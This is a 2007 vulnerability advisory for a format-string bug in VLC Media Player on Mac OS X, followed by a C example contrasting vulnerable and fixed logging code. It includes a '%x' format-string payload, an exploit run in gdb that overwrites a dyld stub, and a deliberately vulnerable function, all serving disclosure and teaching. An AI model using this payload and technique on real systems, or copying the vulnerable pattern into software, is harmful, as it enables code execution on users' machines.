DMA[2007-0102a] - 'VLC Media Player Format String Vulnerability'

Author: Kevin Finisterre
Vendor(s): http://www.videolan.org/vlc/
Product: 'VLC media player for Mac OS X'

References:
http://www.digitalmunition.com/DMA[2007-0102a].txt
http://projects.info-pull.com/moab/MOAB-02-01-2007.html
http://sapheal.cybersecurity.pl/funny/FifaWorldCup.txt (also found the bug)

Preface:

To all the folks out there like this chap...
http://www.unsanity.org/archives/mac_os_x/the_month_of_trolly_trolls_and.php
let me take a moment to first comment on a few things...

1. Odd, this "exploit" doesn't even crash VLC for me.
- I called it an Apple bug for a reason... maybe that's why it's not crashing your Win32 VLC player!

2. Other people say they can crash VLC (and just crash)
- Read the advisory numnuts... what was not clear about "The exploit will need some adjustment"?

3. VLC isn't made by Apple and has nothing to do with Apple other than it runs on Mac OS X.
- Ding Ding Ding... you get a red star (kinda)! Check item 3 in the MOAB F.A.Q., it is self explanatory.

4. Only one of the 23 people I've talked to actually got this QuickTime streaming exploit to speak anything.
- Um... how many of those idiots were running on PowerPC macs? How many read the advisory in its entirety?

5. Number one is usually quite difficult and it's what makes this example a crapshoot.
- Bzzzzzzt wrong. What makes it a crapshoot is the memory allocations... which, if you READ, can be worked with.

6. Remember, just because something crashes, does not mean it is exploitable.
- And remember, just because a random blogger claims something is not exploitable... does not mean it's not. Challenge these idiots to show you WHY they are NOT exploitable.

The main reason this application was picked for MOAB was because of the following press release and hoopla surrounding the new OSX support of .wmv files within VLC media player.
http://www.powerpage.org/2006/12/vlc_086_released_becomes_universal_binary.html

Description:

VideoLAN is a software project which produces free software for video, released under the GNU General Public License. The main product is the cross-platform VLC media player. The VLC media player is a highly portable multimedia player for various audio and video formats (MPEG1, MPEG2, MPEG4, DivX, mp3, ogg, ...) as well as DVDs, VCDs, and various streaming protocols. It can also be used as a server to stream in unicast or multicast in IPv4 or IPv6 on a high-bandwidth network.

Debug message strings can be used to trigger an exploitable format string condition in the OSX version of VLC Media Player. These strings can be passed to VLC Media Player via the URL handlers that are installed during program installation. In the debug output below the playlist item name is echoed through the debug logger with its %x conversions interpreted rather than printed literally:

main debug: CPU has capabilities 486 586 MMX MMXEXT SSE SSE2 FPU
...
main debug: using interface module "macosx"
main debug: thread 42050048 (manage) created at priority -47 (interface/interface.c:164)
main debug: adding playlist item `%x.%x.%x.%x.%x.%x' ( udp://%x.%x.%x.%x.%x.%x )
main debug: creating new input thread
...
access_udp error: cannot open socket
vcdx warning: Can't get file status for 0.0.0.158996fb.158f89e0.29a3400: No such file or directory
vcdx warning: could not retrieve file info for `0.0.0.158996fb.158f89e0.29a3400': No such file or directory
vcdx warning: can't open nrg image file 0.0.0.158996fb.158f89e0.29a3400 for reading

On the x86 platform an attacker can overwrite dyld_stubs in order to influence the execution flow of VLC media player.

kevin-finisterres-computer:~/Desktop kf$ ./VLCMediaSlayer-x86.pl
jump address is: 0x589eaea4
writing to file: pwnage.m3u
kevin-finisterres-computer:~/Desktop kf$ gdb -q /Applications/VLC.app/Contents/MacOS/VLC 2035
Reading symbols for shared libraries ..................... done
/Users/kf/Desktop/2035: No such file or directory.
Attaching to program: `/Applications/VLC.app/Contents/MacOS/VLC', process 2035.
Reading symbols for shared libraries .....+..............................................................+++ ..... done
0x90009857 in mach_msg_trap ()
(gdb) open pwnage.m3u
Filename 'pwnage.m3u' not found in this program's debug information.
(gdb) shell open pwnage.m3u
(gdb) c
Continuing.
Reading symbols for shared libraries .... done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x000003ff
[Switching to process 2035 thread 0x67cb]
0xa0011393 in dyld_stub___vfprintf ()
(gdb) x/x 0xa0011393
0xa0011393 : 0x589eaea4

Workaround:

Check out http://developers.videolan.org/vlc/ and install the latest CVS version once a patch has been developed. The current fix is here:
http://trac.videolan.org/vlc/changeset/18481

Disable the URL handlers for VLC media player.

Landon may also have something for you in a day or so. Seriously this guy is cool as shit for doing this.
http://landonf.bikemonkey.org/code/macosx/MOAB_Day_1.20070102060815.15950.zadder.local.html
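The bug class in the Description above (an untrusted playlist item name reaching a variadic debug logger as its format string) and the shape of the fix that the Workaround points at, shown as an added example in C. This is not VLC's code and not the changeset linked above: debug_log, log_item_vulnerable, log_item_fixed and escape_percent are hypothetical names, and the item name is a constructed sample modelled on the `%x.%x.%x.%x.%x.%x' entry in the debug log.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not VLC code. debug_log() is a stand-in for a variadic
 * debug logger. The format attribute lets gcc/clang (-Wformat-security)
 * flag any call site that passes a non-literal format with no arguments. */
static int debug_log(char *out, size_t out_len, const char *fmt, ...)
    __attribute__((format(printf, 3, 4)));

static int debug_log(char *out, size_t out_len, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, out_len, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable pattern: the message is built first, with the untrusted item
 * name embedded in it, and the finished message is then handed to the
 * logger as its format string. Every %x or %n inside the name is now
 * interpreted against variadic arguments that were never passed. */
int log_item_vulnerable(char *out, size_t out_len, const char *item_name)
{
    char msg[256];
    snprintf(msg, sizeof msg, "adding playlist item `%s'", item_name);
    return debug_log(out, out_len, msg);   /* gcc/clang warn on this line */
}

/* Fixed pattern: the format is a literal and the untrusted name travels as
 * a %s argument, so it is copied into the output, never interpreted. */
int log_item_fixed(char *out, size_t out_len, const char *item_name)
{
    return debug_log(out, out_len, "adding playlist item `%s'", item_name);
}

/* Mitigation for a legacy API that only accepts a format string: double
 * every '%' so the data prints verbatim. Returns the escaped length. */
size_t escape_percent(const char *in, char *out, size_t out_len)
{
    size_t o = 0;
    if (out_len == 0)
        return 0;
    for (; *in != '\0'; in++) {
        size_t need = (*in == '%') ? 2 : 1;
        if (o + need >= out_len)          /* keep room for the NUL */
            break;
        out[o++] = *in;
        if (*in == '%')
            out[o++] = '%';
    }
    out[o] = '\0';
    return o;
}

/* Returns 1 if the fixed logger echoes the name byte for byte. */
int fixed_keeps_name_verbatim(const char *item_name)
{
    char out[512];
    log_item_fixed(out, sizeof out, item_name);
    return strstr(out, item_name) != NULL;
}

/* Returns 1 if escaping lets the name survive the format-only path. */
int escaped_survives_legacy_path(const char *item_name)
{
    char escaped[512], out[512];
    escape_percent(item_name, escaped, sizeof escaped);
    log_item_vulnerable(out, sizeof out, escaped);
    return strstr(out, item_name) != NULL;
}

int main(void)
{
    /* Constructed sample mirroring the item name in the advisory log. */
    const char *hostile = "%x.%x.%x.%x.%x.%x";
    char out[512], escaped[512];

    log_item_fixed(out, sizeof out, hostile);
    printf("fixed   : %s\n", out);

    escape_percent(hostile, escaped, sizeof escaped);
    log_item_vulnerable(out, sizeof out, escaped);
    printf("escaped : %s\n", out);

    /* log_item_vulnerable(out, sizeof out, hostile) is deliberately not
     * called: vsnprintf would walk argument slots that do not exist. */
    return 0;
}
```

Build with `cc -Wall -Wformat-security example.c`: the only diagnostic lands on the debug_log call inside log_item_vulnerable, which is exactly the line a code review of a logging wrapper should look for. Passing the data as a `%s` argument is the real fix; escape_percent is only for the case where a logger's signature cannot be changed.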